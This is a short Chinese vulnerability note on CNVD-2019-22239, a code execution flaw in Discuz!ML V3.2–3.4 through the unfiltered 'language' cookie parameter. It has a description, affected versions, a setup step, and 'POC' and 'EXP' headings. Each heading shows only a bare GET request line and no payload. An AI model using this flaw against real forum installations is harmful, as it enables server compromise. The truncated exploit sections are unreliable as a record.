Discuz!ML 3.x任意代码执行漏洞 CNVD-2019-22239
一.描述;
1 | Discuz! X是康盛公司(Comsenz)推出的一个以社区为基础的专业建站平台,让论坛(BBS)、社交网络(SNS)、门户(Portal)、群组(Group)、开放平台(Open Platform)应用充分融合于一体,帮助网站实现一站式服务。Discuz!ML系统对cookie中接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。 |
二.影响版本;
版本:Discuz!ML V3.2-3.4
三.环境搭建
1 | 1.使用phpstudy搭建网站; |
四.利用;
POC:
1 | GET /Discuz/upload/ HTTP/1.1 |
EXP:
1 | GET /Discuz/upload/ HTTP/1.1 |